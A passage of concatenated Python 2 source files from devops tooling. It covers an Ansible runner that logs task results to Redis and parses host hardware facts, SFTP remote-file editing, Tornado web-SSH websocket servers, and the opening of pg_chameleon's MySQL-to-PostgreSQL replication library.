msg = "\nTASK [%s] " % (task.get_name().strip())
if len(msg) < 80: msg = msg + '*' * (80 - len(msg))
r.lpush(self.redisKey, msg)
# args = ''
# if not task.no_log and C.DISPLAY_ARGS_TO_STDOUT:
# args = u', '.join(u'%s=%s' % a for a in task.args.items())
# args = u' %s' % args
# print u"\nTASK [%s%s]" % (task.get_name().strip(), args)
def v2_playbook_on_task_start(self, task, is_conditional):
self._print_task_banner(task)
def v2_playbook_on_cleanup_task_start(self, task):
msg = "CLEANUP TASK [%s]" % task.get_name().strip()
r.lpush(self.redisKey, msg)
def v2_playbook_on_handler_task_start(self, task):
msg = "RUNNING HANDLER [%s]" % task.get_name().strip()
r.lpush(self.redisKey, msg)
def v2_playbook_on_stats(self, stats):
msg = "\nPLAY RECAP *********************************************************************"
r.lpush(self.redisKey, msg)
hosts = sorted(stats.processed.keys())
for h in hosts:
t = stats.summarize(h)
self.task_status[h] = {
"ok": t['ok'],
"changed": t['changed'],
"unreachable": t['unreachable'],
"skipped": t['skipped'],
"failed": t['failures']
}
msg = "{host}\t\t: ok={ok}\tchanged={changed}\tunreachable={unreachable}\tskipped={skipped}\tfailed={failed}".format(
host=h, ok=t['ok'], changed=t['changed'],
unreachable=t['unreachable'],
skipped=t["skipped"], failed=t['failures']
)
r.lpush(self.redisKey, msg)
def v2_runner_item_on_ok(self, result):
delegated_vars = result._result.get('_ansible_delegated_vars', None)
if result._task.action in ('include', 'include_role'):
return
elif result._result.get('changed', False):
msg = 'changed'
else:
msg = 'ok'
if delegated_vars:
msg += ": [%s -> %s]" % (result._host.get_name(), delegated_vars['ansible_host'])
else:
msg += ": [%s]" % result._host.get_name()
msg += " => (item=%s)" % (json.dumps(self._get_item(result._result)))
if (
self._display.verbosity > 0 or '_ansible_verbose_always' in result._result) and not '_ansible_verbose_override' in result._result:
msg += " => %s" % json.dumps(result._result)
r.lpush(self.redisKey, msg)
def v2_runner_item_on_failed(self, result):
delegated_vars = result._result.get('_ansible_delegated_vars', None)
msg = "failed: "
if delegated_vars:
msg += "[%s -> %s]" % (result._host.get_name(), delegated_vars['ansible_host'])
else:
msg += "[%s]" % (result._host.get_name())
msg = msg + " (item=%s) => %s\n" % (self._get_item(json.dumps(result._result)), json.dumps(result._result)),
r.lpush(self.redisKey, msg)
def v2_runner_item_on_skipped(self, result):
msg = "skipping: [%s] => (item=%s) " % (result._host.get_name(), self._get_item(result._result))
if (
self._display.verbosity > 0 or '_ansible_verbose_always' in result._result) and not '_ansible_verbose_override' in result._result:
msg += " => %s" % json.dumps(result._result)
r.lpush(self.redisKey, msg)
def v2_runner_retry(self, result):
task_name = result.task_name or result._task
msg = "FAILED - RETRYING: %s (%d retries left)." % (
task_name, result._result['retries'] - result._result['attempts'])
if (
self._display.verbosity > 2 or '_ansible_verbose_always' in result._result) and not '_ansible_verbose_override' in result._result:
msg += "Result was: %s" % json.dumps(result._result, indent=4)
r.lpush(self.redisKey, msg)
class PlayBookResultsCollector(CallbackBase):
CALLBACK_VERSION = 2.0
def __init__(self, *args, **kwargs):
super(PlayBookResultsCollector, self).__init__(*args, **kwargs)
self.task_ok = {}
self.task_changed = {}
self.task_skipped = {}
self.task_failed = {}
self.task_status = {}
self.task_unreachable = {}
def v2_runner_on_ok(self, result, *args, **kwargs):
self.task_ok[result._host.get_name()] = result._result
def v2_runner_on_changed(self, result):
self.task_changed[result._host.get_name()] = result._result
def v2_runner_on_failed(self, result, *args, **kwargs):
self.task_failed[result._host.get_name()] = result._result
def v2_runner_on_unreachable(self, result):
self.task_unreachable[result._host.get_name()] = result._result
def v2_runner_on_skipped(self, result):
self.task_ok[result._host.get_name()] = result._result
def v2_playbook_on_stats(self, stats):
hosts = sorted(stats.processed.keys())
for h in hosts:
t = stats.summarize(h)
self.task_status[h] = {
"ok": t['ok'],
"changed": t['changed'],
"unreachable": t['unreachable'],
"skipped": t['skipped'],
"failed": t['failures']
}
class ANSRunner(object):
"""
This is a General object for parallel execute modules.
"""
def __init__(self, resource, redisKey=None, *args, **kwargs):
self.resource = resource
# self.host_list = '/etc/ansible/ansible_hosts'
self.inventory = None
self.variable_manager = None
self.loader = None
self.options = None
self.passwords = None
self.callback = None
self.__initializeData()
self.results_raw = {}
self.redisKey = redisKey
def __initializeData(self):
""" 初始化ansible """
Options = namedtuple('Options', ['connection', 'module_path', 'forks', 'timeout', 'remote_user',
'ask_pass', 'private_key_file', 'ssh_common_args', 'ssh_extra_args',
'sftp_extra_args',
'scp_extra_args', 'become', 'become_method', 'become_user', 'ask_value_pass',
'verbosity',
'check', 'listhosts', 'listtasks', 'listtags', 'syntax'])
self.variable_manager = VariableManager()
self.loader = DataLoader()
self.options = Options(connection='smart', module_path=None, forks=100, timeout=10,
remote_user='root', ask_pass=False, private_key_file=None, ssh_common_args=None,
ssh_extra_args=None,
sftp_extra_args=None, scp_extra_args=None, become=None, become_method=None,
become_user='root', ask_value_pass=False, verbosity=None, check=False, listhosts=False,
listtasks=False, listtags=False, syntax=False)
self.passwords = dict(ssh<PASSWORD>=None, becomepass=None)
self.inventory = MyInventory(self.resource, self.loader, self.variable_manager).inventory
# self.inventory = Inventory(loader=self.loader,variable_manager=self.variable_manager,host_list=self.host_list)
self.variable_manager.set_inventory(self.inventory)
def run_model(self, host_list, module_name, module_args):
"""
run module from andible ad-hoc.
module_name: ansible module_name
module_args: ansible module args
"""
play_source = dict(
name="Ansible Play",
hosts=host_list,
gather_facts='no',
tasks=[dict(action=dict(module=module_name, args=module_args))]
)
play = Play().load(play_source, variable_manager=self.variable_manager, loader=self.loader)
tqm = None
if self.redisKey:
self.callback = ModelResultsCollectorToRedis(self.redisKey)
else:
self.callback = ModelResultsCollector()
try:
tqm = TaskQueueManager(
inventory=self.inventory,
variable_manager=self.variable_manager,
loader=self.loader,
options=self.options,
passwords=self.passwords,
)
tqm._stdout_callback = self.callback
tqm.run(play)
# print self.callback.host_ok.items()
# for host, result in self.callback.host_ok.items():
# print host,result._result
finally:
if tqm is not None:
tqm.cleanup()
def run_playbook(self, host_list,playbook_path, extra_vars=None):
"""
run ansible palybook
"""
try:
if self.redisKey:
self.callback = PlayBookResultsCollectorToRedis(self.redisKey)
# self.callback = mycallback()
else:
# self.callback = mycallback()
self.callback = PlayBookResultsCollector()
if extra_vars: self.variable_manager.extra_vars = extra_vars
executor = PlaybookExecutor(
playbooks=[playbook_path], inventory=self.inventory, variable_manager=self.variable_manager,
loader=self.loader,
options=self.options, passwords=self.passwords,
)
# self.results_callback=mycallback()
executor._tqm._stdout_callback = self.callback
try:
result = executor.run()
# for host, a in self.callback.task_ok.items():
# print host,a,'447'
except Exception as e:
print e
# return result,self.callback
# results = self.callback.results
except Exception as e:
# return False
print e
def get_model_result(self):
self.results_raw = {'success': {}, 'failed': {}, 'unreachable': {}}
for host, result in self.callback.host_ok.items():
self.results_raw['success'][host] = result._result
for host, result in self.callback.host_failed.items():
self.results_raw['failed'][host] = result._result
for host, result in self.callback.host_unreachable.items():
self.results_raw['unreachable'][host] = result._result
return json.dumps(self.results_raw)
def get_playbook_result(self):
self.results_raw = {'skipped': {}, 'failed': {}, 'ok': {}, "status": {}, 'unreachable': {}, "changed": {}}
for host, result in self.callback.task_ok.items():
self.results_raw['ok'][host] = result
for host, result in self.callback.task_failed.items():
self.results_raw['failed'][host] = result
for host, result in self.callback.task_status.items():
self.results_raw['status'][host] = result
for host, result in self.callback.task_changed.items():
self.results_raw['changed'][host] = result
for host, result in self.callback.task_skipped.items():
self.results_raw['skipped'][host] = result
for host, result in self.callback.task_unreachable.items():
self.results_raw['unreachable'][host] = result
return self.results_raw
def handle_cmdb_data(self, data):
'''处理setup返回结果方法'''
data_list = []
for k, v in json.loads(data).items():
if k == "success":
for x, y in v.items():
cmdb_data = {}
data = y.get('ansible_facts')
disk_size = 0
cpu = data['ansible_processor'][-1]
for k, v in data['ansible_devices'].items():
if k[0:2] in ['sd', 'hd', 'ss', 'vd']:
disk = int((int(v.get('sectors')) * int(v.get('sectorsize'))) / 1024 / 1024 / 1024)
disk_size = disk_size + disk
cmdb_data['serial'] = data['ansible_product_serial'].split()[0]
cmdb_data['ip'] = x
cmdb_data['cpu'] = cpu.replace('@', '')
ram_total = str(data['ansible_memtotal_mb'])
if len(ram_total) == 4:
ram_total = ram_total[0] + 'GB'
elif len(ram_total) == 5:
ram_total = ram_total[0:2] + 'GB'
elif len(ram_total) > 5:
ram_total = ram_total[0:3] + 'GB'
else:
ram_total = ram_total + 'MB'
cmdb_data['ram_total'] = ram_total
cmdb_data['disk_total'] = str(disk_size) + 'GB'
cmdb_data['system'] = data['ansible_distribution'] + ' ' + data[
'ansible_distribution_version'] + ' ' + data['ansible_userspace_bits']
cmdb_data['model'] = data['ansible_product_name'].split(':')[0]
cmdb_data['cpu_number'] = data['ansible_processor_count']
cmdb_data['vcpu_number'] = data['ansible_processor_vcpus']
cmdb_data['cpu_core'] = data['ansible_processor_cores']
cmdb_data['hostname'] = data['ansible_hostname']
cmdb_data['kernel'] = str(data['ansible_kernel'])
cmdb_data['manufacturer'] = data['ansible_system_vendor']
if data['ansible_selinux']:
cmdb_data['selinux'] = data['ansible_selinux'].get('status')
else:
cmdb_data['selinux'] = 'disabled'
cmdb_data['swap'] = str(data['ansible_swaptotal_mb']) + 'MB'
cmdb_data['status'] = 0
data_list.append(cmdb_data)
elif k == "unreachable":
for x, y in v.items():
cmdb_data = {}
cmdb_data['status'] = 1
cmdb_data['ip'] = x
data_list.append(cmdb_data)
if data_list:
return data_list
else:
return False
def handle_cmdb_crawHw_data(self, data):
data_list = []
for k, v in json.loads(data).items():
if k == "success":
for x, y in v.items():
cmdb_data = {}
cmdb_data['ip'] = x
data = y.get('ansible_facts')
cmdb_data['mem_info'] = data.get('ansible_mem_detailed_info')
cmdb_data['disk_info'] = data.get('ansible_disk_detailed_info')
data_list.append(cmdb_data)
if data_list:
return data_list
else:
return False
def handle_model_data(self, data, module_name, module_args=None):
'''处理ANSIBLE 模块输出内容'''
module_data = json.loads(data)
failed = module_data.get('failed')
success = module_data.get('success')
unreachable = module_data.get('unreachable')
data_list = []
if module_name == "raw":
if failed:
for x, y in failed.items():
data = {}
data['ip'] = x
try:
data['msg'] = y.get('stdout').replace('\t\t', '<br>').replace('\r\n', '<br>').replace('\t',
'<br>')
except:
data['msg'] = None
if y.get('rc') == 0:
data['status'] = 'succeed'
else:
data['status'] = 'failed'
data_list.append(data)
elif success:
for x, y in success.items():
data = {}
data['ip'] = x
try:
data['msg'] = y.get('stdout').replace('\t\t', '<br>').replace('\r\n', '<br>').replace('\t',
'<br>')
except:
data['msg'] = None
if y.get('rc') == 0:
data['status'] = 'succeed'
else:
data['status'] = 'failed'
data_list.append(data)
elif module_name == "ping":
if success:
for x, y in success.items():
data = {}
data['ip'] = x
if y.get('ping'):
data['msg'] = y.get('ping')
data['status'] = 'succeed'
data_list.append(data)
else:
if success:
for x, y in success.items():
data = {}
data['ip'] = x
if y.get('invocation'):
data['msg'] = "Ansible %s with %s execute success." % (module_name, module_args)
data['status'] = 'succeed'
data_list.append(data)
elif failed:
for x, y in failed.items():
data = {}
data['ip'] = x
data['msg'] = y.get('msg')
data['status'] = 'failed'
data_list.append(data)
if unreachable:
for x, y in unreachable.items():
data = {}
data['ip'] = x
data['msg'] = y.get('msg')
data['status'] = 'failed'
data_list.append(data)
if data_list:
return data_list
else:
return False
if __name__ == '__main__':
"""
when u use the dymanic inventory, this format can custom group , and u yml file need to define group in hosts with the variable of the py file
"""
# ---
# - name: create user
# hosts: heihei
# user: root
# gather_facts: false
# vars:
# - user: "test"
# tasks:
# - name: create user
# user: name="{{ user }}"
# resource = {
# "heihei":{
# "hosts":[{"hostname": "172.16.17.32","port": 22,"username": 'root',"password": '<PASSWORD>'},{"hostname": "172.16.17.32","port": 22,"username": 'root',"password": '<PASSWORD>'}],
# "vars": {
# "var1": "heihei",
# }
# }
# }
"""
or u can transfer a list inlcude the host info ,but the yml hosts: name is "default_group",other the same
"""
resource = [
{"hostname": "172.16.17.32","port": 22,"username": 'root',"password": '<PASSWORD>'},
# {"hostname": "172.16.17.32","port": 22,"username": 'root',"password": '<PASSWORD>'}
]
# resource = ["172.16.17.32"]
rbt = ANSRunner(resource, redisKey='<KEY>')
rbt.run_model(host_list=["172.16.17.32"], module_name='setup',module_args="")
# rbt.run_playbook(['172.16.17.32','172.16.17.32'],playbook_path='/Users/wupeijin/code3/django-tornado/upload/playbook/1.yml',extra_vars='')
# result = rbt.get_playbook_result()
a = rbt.get_model_result()
print rbt.handle_cmdb_data(a)
# print a
# print result
```
#### File: ops/views/remote_file.py
```python
import sys, json, os, re,redis
from .. import ssh_settings
from ssh_error import SSHError
from ssh_file_transfer import SSHFileTransfer
from ssh_module_controller import SSHControler
r = redis.StrictRedis(host=ssh_settings.redisip, port=ssh_settings.redisport, db=0)
class RemoteFile(object):
def __init__(self):
pass
def add_remote_file(self,path='', description='', server='', id='', ip=''):
ssh_info = {"status": False, "content": ""}
try:
data = {"path": path, "description": description, "server": server, "id": id,
"ip": ip}
data = json.dumps(data, encoding="utf8", ensure_ascii=False)
r.hset("remotefilelist", id, data)
ssh_info["tid"] = id
ssh_info["status"] = True
except Exception, e:
ssh_info["status"] = False
ssh_info["content"] = str(e)
return ssh_info
def get_remote_file_list(self):
ssh_info = {"status": False, "content": ""}
try:
data = r.hgetall("remotefilelist")
print data
info = {}
for id in data.keys():
tmp = json.loads(data[id])
info[id] = tmp
ssh_info["content"] = info
ssh_info["status"] = True
except Exception, e:
ssh_info["status"] = False
ssh_info["content"] = str(e)
return ssh_info
def delete_remote_file_list(self, id):
ssh_info = {"status": False, "content": ""}
try:
data = r.hdel("remotefilelist", id)
ssh_info["status"] = True
except Exception, e:
ssh_info["status"] = False
ssh_info["content"] = str(e)
return ssh_info
def remote_file_content(self, id, action, file_content=""):
ssh_info = {"status": False, "content": ""}
try:
data = RemoteFile().get_remote_file_list()
if not data["status"]: raise SSHError(data["content"])
content = data["content"]
path = content[id]["path"]
path = re.sub(" ", "", path)
ip = content[id]["ip"]
host_info = SSHControler().convert_id_to_ip(ip)
if not host_info["status"]: raise SSHError(host_info["content"])
host = host_info["content"]
sftp = SSHFileTransfer()
login = sftp.login(**host)
if not login["status"]: raise SSHError(login["content"])
if action == "GET":
ssh_info = sftp.get_filecontent(path)
elif action == "WRITE":
ssh_info = sftp.write_filecontent(path, file_content)
else:
raise SSHError("remotefilelist")
except Exception, e:
ssh_info["status"] = False
ssh_info["content"] = str(e)
return ssh_info
```
#### File: ops/views/ssh_module_controller.py
```python
import os,sys,json,redis
from ssh import SSH_SSH
from ssh_error import SSHError
import threading
import ssh_settings
r = redis.StrictRedis(host=ssh_settings.redisip, port=ssh_settings.redisport, db=0)
class SSHControler(object):
def __init__(self):
self.SSH = SSH_SSH()
def controler_center(self, parameter={}):
cmd = parameter.get("cmd", False)
tid = parameter["tid"]
pass
def connect(self, ip=""):
ssh_info = {"content": "", "status": False}
try:
server_config = self.convert_id_to_ip(ip)
# print server_config
if not server_config["status"]: raise SSHError(server_config["content"])
if server_config["status"]:
ssh_info = self.SSH.login(**server_config["content"])
else:
ssh_info["content"] = server_config["content"]
except Exception, e:
print "ssh错误", str(e)
ssh_info["content"] = str(e)
ssh_info["status"] = False
return ssh_info
def command_controler(self, tid='', cmd='', ip=""):
log_name = "log.%s.%s" % (tid, ip)
log_content = {
"content": "",
"stage": "done",
"status": False,
}
ssh_info = {"content": "", "status": False}
try:
current = "current.%s" % tid
data = self.connect(ip=ip)
if data["status"]:
ssh = data["content"] ###登录界面
self.SSH.execute(cmd=cmd, ip=ip, tid=tid)
ssh_info["status"] = True
else:
raise SSHError(data["content"])
except Exception, e:
print "程序错误", e,'controller'
log_content["content"] = str(e)
log_content = json.dumps(log_content, encoding="utf8", ensure_ascii=False)
r.rpush(log_name, log_content)
ssh_info["content"] = str(e)
ssh_info["status"] = False
print ssh_info,'60'
r.incr(current)
return ssh_info
# @staticmethod
def convert_id_to_ip(self,ip=""):
ssh_info = {"status": False, "content": "指定的ID不存在"}
try:
servers_list = r.lrange("server", 0, -1)
if servers_list is None:
pass
else:
for _line in servers_list:
line = json.loads(_line)
if str(ip) == line["ip"]:
ssh_info["content"] = line
ssh_info["status"] = True
break
except Exception, e:
ssh_info["status"] = False
ssh_info["content"] = str(e)
return ssh_info
```
#### File: devops/webssh/main.py
```python
import os.path
import tornado.ioloop
import tornado.web
import tornado.httpserver
import tornado.options
from tornado.options import options
from config import init_config
from ioloop import IOLoop
import tornado.wsgi,logging
import django.core.handlers.wsgi
from daemon import Bridge
from data import ClientData
from utils import check_ip, check_port
settings = dict(
template_path=os.path.join(os.path.dirname(__file__), "../templates"),
static_path=os.path.join(os.path.dirname(__file__), "../static"),
debug=True,
)
class Application(tornado.web.Application):
def __init__(self):
tornado.web.Application.__init__(self, handlers, **settings)
class IndexHandler(tornado.web.RequestHandler):
def get(self):
self.render("test1.html")
class WSHandler(tornado.websocket.WebSocketHandler):
clients = dict()
def check_origin(self, origin):
return True
def get_client(self):
return self.clients.get(self._id(), None)
def put_client(self):
bridge = Bridge(self)
self.clients[self._id()] = bridge
def remove_client(self):
bridge = self.get_client()
if bridge:
bridge.destroy()
del self.clients[self._id()]
@staticmethod
def _check_init_param(data):
return check_ip(data["hostname"]) and check_port(data["port"])
@staticmethod
def _is_init_data(data):
return data.get_type() == 'init'
def _id(self):
return id(self)
def open(self):
self.put_client()
def on_message(self, message):
# print message
bridge = self.get_client()
# logging.info(' bridge client :%s' % bridge)
client_data = ClientData(message)
if self._is_init_data(client_data):
if self._check_init_param(client_data.data):
bridge.open(client_data.data)
logging.info('connection established from: %s' % self._id())
else:
self.remove_client()
logging.warning('init param invalid: %s' % client_data.data)
else:
if bridge:
bridge.trans_forward(client_data.data)
def on_close(self):
self.remove_client()
logging.info('client close the connection: %s' % self._id())
def main():
init_config()
options.parse_config_file("webssh.conf")
wsgi_app = tornado.wsgi.WSGIContainer(
django.core.handlers.wsgi.WSGIHandler())
tornado_app = tornado.web.Application(
[
(r"/", IndexHandler),
(r"/ws", WSHandler),
('.*', tornado.web.FallbackHandler, dict(fallback=wsgi_app)),
],**settings)
http_server = tornado.httpserver.HTTPServer(tornado_app)
http_server.listen(options.port)
IOLoop.instance().start()
tornado.ioloop.IOLoop.instance().start()
if __name__ == "__main__":
main()
```
#### File: jinjin123/devops2.0/run_tornado.py
```python
from tornado.options import options, define, parse_command_line
import sys,os,json,subprocess
import base64,logging
import tornado.httpserver
import tornado.ioloop
import tornado.wsgi
import tornado.web
import tornado.websocket
from daemon import Bridge
from data import ClientData
from utils import check_ip, check_port
import django.core.handlers.wsgi
define('port', type=int, default=8002)
class IndexHandler(tornado.web.RequestHandler):
def get(self):
self.render("test1.html")
class WSHandler(tornado.websocket.WebSocketHandler):
clients = dict()
def get_client(self):
return self.clients.get(self._id(), None)
def put_client(self):
bridge = Bridge(self)
self.clients[self._id()] = bridge
def remove_client(self):
bridge = self.get_client()
if bridge:
bridge.destroy()
del self.clients[self._id()]
@staticmethod
def _check_init_param(data):
return check_ip(data["hostname"]) and check_port(data["port"])
@staticmethod
def _is_init_data(data):
return data.get_type() == 'init'
def _id(self):
return id(self)
def open(self):
self.put_client()
def on_message(self, message):
bridge = self.get_client()
# logging.info(' bridge client :%s' % bridge)
client_data = ClientData(message)
if self._is_init_data(client_data):
if self._check_init_param(client_data.data):
bridge.open(client_data.data)
logging.info('connection established from: %s' % self._id())
else:
self.remove_client()
logging.warning('init param invalid: %s' % client_data.data)
else:
if bridge:
bridge.trans_forward(client_data.data)
def on_close(self):
self.remove_client()
logging.info('client close the connection: %s' % self._id())
settings = {
"template_path":os.path.join(os.path.dirname(__file__),"../devops/templates"),
"static_path":os.path.join(os.path.dirname(__file__),"../devops/static"),
}
def main():
# os.environ['DJANGO_SETTINGS_MODULE'] = 'devops.settings' # TODO: edit this
# sys.path.append('./devops') # path to your project if needed
parse_command_line()
options.parse_config_file("webssh.conf")
#wsgi_app = get_wsgi_application()
#container = tornado.wsgi.WSGIContainer(wsgi_app)
wsgi_app = tornado.wsgi.WSGIContainer(
django.core.handlers.wsgi.WSGIHandler())
tornado_app = tornado.web.Application(
[
(r"/", IndexHandler),
(r"/ws", WSHandler),
('.*', tornado.web.FallbackHandler, dict(fallback=wsgi_app)),
],**settings)
server = tornado.httpserver.HTTPServer(tornado_app)
server.listen(options.port)
tornado.ioloop.IOLoop.instance().start()
if __name__ == '__main__':
main()
``` |
{
"source": "jinjin123/switch-mysql-postgresql",
"score": 3
} |
#### File: pg_chameleon/lib/pg_lib.py
```python
import psycopg2
import os
import io
import sys
import json
import datetime
import decimal
import time
import base64
class pg_encoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, datetime.time) or isinstance(obj, datetime.datetime) or isinstance(obj, datetime.date) or isinstance(obj, decimal.Decimal) or isinstance(obj, datetime.timedelta):
return str(obj)
return json.JSONEncoder.default(self, obj)
class pg_connection(object):
def __init__(self, global_config):
self.global_conf=global_config
self.pg_conn=self.global_conf.pg_conn
self.pg_database=self.global_conf.pg_database
self.dest_schema=self.global_conf.my_database
self.pg_connection=None
self.pg_cursor=None
self.pg_charset=self.global_conf.pg_charset
def connect_db(self):
"""
Connects to PostgreSQL using the parameters stored in pg_pars built adding the key dbname to the self.pg_conn dictionary.
The method after the connection creates a database cursor and set the session to autocommit.
"""
pg_pars=dict(list(self.pg_conn.items())+ list({'dbname':self.pg_database}.items()))
strconn="dbname=%(dbname)s user=%(user)s host=%(host)s password=%(<PASSWORD> port=%(port)s" % pg_pars
self.pgsql_conn = psycopg2.connect(strconn)
self.pgsql_conn .set_isolation_level(psycopg2.extensions.ISOLATION_LEVEL_AUTOCOMMIT)
self.pgsql_conn .set_client_encoding(self.pg_charset)
self.pgsql_cur=self.pgsql_conn .cursor()
def disconnect_db(self):
"""
The method disconnects from the database closing the connection.
"""
self.pgsql_conn.close()
class pg_engine(object):
"""
The class pg_engine manages the replica initialisation and execution on the PostgreSQL side.
The class connects to the database when instantiated and setup several class attributes used by the replica.
In particular the class dictionary type_dictionary is used to map the MySQL types to the equivalent PostgreSQL types.
Unlike pgloader, which allows the type mapping configuration, the dictionary is hardcoded as the mapping is an effort to keep the replica running as smooth as possible.
The class manages the replica catalogue upgrade using the current catalogue version self.cat_version and the list of migrations self.cat_sql.
If the catalogue version, stored in sch_chameleon.v_version is different from the value stored in self.cat_version then the method upgrade_service_schema() is executed.
"""
def __init__(self, global_config, table_metadata, table_file, logger, sql_dir='sql/'):
self.sleep_on_reindex = global_config.sleep_on_reindex
self.reindex_app_names = global_config.reindex_app_names
self.batch_retention = global_config.batch_retention
self.logger = logger
self.sql_dir = sql_dir
self.idx_sequence = 0
self.pg_conn = pg_connection(global_config)
self.pg_conn.connect_db()
self.table_metadata = table_metadata
self.table_file = table_file
self.type_dictionary = {
'integer':'integer',
'mediumint':'bigint',
'tinyint':'integer',
'smallint':'integer',
'int':'integer',
'bigint':'bigint',
'varchar':'character varying',
'text':'text',
'char':'character',
'datetime':'timestamp without time zone',
'date':'date',
'time':'time without time zone',
'timestamp':'timestamp without time zone',
'tinytext':'text',
'mediumtext':'text',
'longtext':'text',
'tinyblob':'bytea',
'mediumblob':'bytea',
'longblob':'bytea',
'blob':'bytea',
'binary':'bytea',
'varbinary':'bytea',
'decimal':'numeric',
'double':'double precision',
'double precision':'double precision',
'float':'double precision',
'bit':'integer',
'year':'integer',
'enum':'enum',
'set':'text',
'json':'text',
'bool':'boolean',
'boolean':'boolean',
'geometry':'bytea',
}
self.table_ddl = {}
self.idx_ddl = {}
self.type_ddl = {}
self.pg_charset = self.pg_conn.pg_charset
self.cat_version = '1.6'
self.cat_sql = [
{'version':'base','script': 'create_schema.sql'},
{'version':'0.1','script': 'upgrade/cat_0.1.sql'},
{'version':'0.2','script': 'upgrade/cat_0.2.sql'},
{'version':'0.3','script': 'upgrade/cat_0.3.sql'},
{'version':'0.4','script': 'upgrade/cat_0.4.sql'},
{'version':'0.5','script': 'upgrade/cat_0.5.sql'},
{'version':'0.6','script': 'upgrade/cat_0.6.sql'},
{'version':'0.7','script': 'upgrade/cat_0.7.sql'},
{'version':'0.8','script': 'upgrade/cat_0.8.sql'},
{'version':'0.9','script': 'upgrade/cat_0.9.sql'},
{'version':'1.0','script': 'upgrade/cat_1.0.sql'},
{'version':'1.1','script': 'upgrade/cat_1.1.sql'},
{'version':'1.2','script': 'upgrade/cat_1.2.sql'},
{'version':'1.3','script': 'upgrade/cat_1.3.sql'},
{'version':'1.4','script': 'upgrade/cat_1.4.sql'},
{'version':'1.5','script': 'upgrade/cat_1.5.sql'},
{'version':'1.6','script': 'upgrade/cat_1.6.sql'},
]
cat_version=self.get_schema_version()
num_schema=(self.check_service_schema())[0]
if cat_version!=self.cat_version and int(num_schema)>0:
self.upgrade_service_schema()
self.table_limit = ['*']
self.master_status = None
def set_application_name(self, action=""):
"""
The method sets the application name in the replica using the variable self.pg_conn.global_conf.source_name,
Making simpler to find the replication processes. If the source name is not set then a generic PGCHAMELEON name is used.
"""
if self.pg_conn.global_conf.source_name:
app_name = "[PGCH] - source: %s, action: %s" % (self.pg_conn.global_conf.source_name, action)
else:
app_name = "[PGCH]"
sql_app_name="""SET application_name=%s; """
self.pg_conn.pgsql_cur.execute(sql_app_name, (app_name , ))
def add_source(self, source_name, dest_schema):
"""
The method add a new source in the replica catalogue.
If the source name is already present an error message is emitted without further actions.
:param source_name: The source name stored in the configuration parameter source_name.
:param dest_schema: The destination schema stored in the configuration parameter dest_schema.
"""
sql_source = """
SELECT
count(i_id_source)
FROM
sch_chameleon.t_sources
WHERE
t_source=%s
;
"""
self.pg_conn.pgsql_cur.execute(sql_source, (source_name, ))
source_data = self.pg_conn.pgsql_cur.fetchone()
cnt_source = source_data[0]
if cnt_source == 0:
sql_add = """
INSERT INTO sch_chameleon.t_sources
(
t_source,
t_dest_schema
)
VALUES
(
%s,
%s
)
RETURNING
i_id_source
;
"""
self.pg_conn.pgsql_cur.execute(sql_add, (source_name, dest_schema ))
source_add = self.pg_conn.pgsql_cur.fetchone()
sql_update = """
UPDATE sch_chameleon.t_sources
SET v_log_table=ARRAY[
't_log_replica_1_src_%s',
't_log_replica_2_src_%s'
]
WHERE i_id_source=%s
;
"""
self.pg_conn.pgsql_cur.execute(sql_update, (source_add[0],source_add[0], source_add[0] ))
sql_parts = """SELECT sch_chameleon.fn_refresh_parts() ;"""
self.pg_conn.pgsql_cur.execute(sql_parts)
else:
print("Source %s already registered." % source_name)
sys.exit()
def get_source_status(self, source_name):
"""
Gets the source status usin the source name.
Possible values are:
ready : the source is registered but the init_replica is not yet done.
initialising: init_replica is initialising
initialised: init_replica finished and the replica process is ready to start
stopped: the replica process is stopped
running: the replica process is running
:param source_name: The source name stored in the configuration parameter source_name.
:type source_name: string
:return: source_status extracted from PostgreSQL
:rtype: string
"""
sql_source = """
SELECT
enm_status
FROM
sch_chameleon.t_sources
WHERE
t_source=%s
;
"""
self.pg_conn.pgsql_cur.execute(sql_source, (source_name, ))
source_data = self.pg_conn.pgsql_cur.fetchone()
if source_data:
source_status = source_data[0]
else:
source_status = 'Not registered'
return source_status
def drop_source(self, source_name):
"""
Drops the source from the replication catalogue discarding any replica reference.
:param source_name: The source name stored in the configuration parameter source_name.
"""
sql_delete = """ DELETE FROM sch_chameleon.t_sources
WHERE t_source=%s
RETURNING v_log_table
; """
self.pg_conn.pgsql_cur.execute(sql_delete, (source_name, ))
source_drop = self.pg_conn.pgsql_cur.fetchone()
for log_table in source_drop[0]:
sql_drop = """DROP TABLE sch_chameleon."%s"; """ % (log_table)
self.pg_conn.pgsql_cur.execute(sql_drop)
def set_source_id(self, source_status):
"""
Sets the source status for the source_name and sets the two class attributes i_id_source and dest_schema.
:param source_status: The source status to be set.
"""
sql_source = """
UPDATE sch_chameleon.t_sources
SET
enm_status=%s
WHERE
t_source=%s
RETURNING i_id_source,t_dest_schema
;
"""
source_name = self.pg_conn.global_conf.source_name
self.pg_conn.pgsql_cur.execute(sql_source, (source_status, source_name))
source_data = self.pg_conn.pgsql_cur.fetchone()
try:
self.i_id_source = source_data[0]
self.dest_schema = source_data[1]
self.source_name = source_name
except:
print("Source %s is not registered." % source_name)
sys.exit()
def clean_batch_data(self):
"""
Removes the replica batch data for the given source id.
The method is used to cleanup incomplete batch data in case of crash or replica's unclean restart
"""
sql_delete = """
DELETE FROM sch_chameleon.t_replica_batch
WHERE i_id_source=%s;
"""
self.pg_conn.pgsql_cur.execute(sql_delete, (self.i_id_source, ))
def create_schema(self):
"""
The method drops and creates the destination schema.
It also set the search_path for the cursor to the destination schema.
"""
sql_drop="DROP SCHEMA IF EXISTS "+self.dest_schema+" CASCADE;"
sql_create=" CREATE SCHEMA IF NOT EXISTS "+self.dest_schema+";"
self.pg_conn.pgsql_cur.execute(sql_drop)
self.pg_conn.pgsql_cur.execute(sql_create)
self.set_search_path()
def store_table(self, table_name):
"""
The method saves the table name along with the primary key definition in the table t_replica_tables.
This is required in order to let the replay procedure which primary key to use replaying the update and delete.
If the table is without primary key is not stored.
A table without primary key is copied and the indices are create like any other table.
However the replica doesn't work for the tables without primary key.
If the class variable master status is set then the master's coordinates are saved along with the table.
This happens in general when a table is added to the replica or the data is refreshed with sync_tables.
:param table_name: the table name to store in the table t_replica_tables
"""
if self.master_status:
master_data = self.master_status[0]
binlog_file = master_data["File"]
binlog_pos = master_data["Position"]
else:
binlog_file = None
binlog_pos = None
table_data=self.table_metadata[table_name]
table_no_pk = True
for index in table_data["indices"]:
if index["index_name"]=="PRIMARY":
table_no_pk = False
sql_insert="""
INSERT INTO sch_chameleon.t_replica_tables
(
i_id_source,
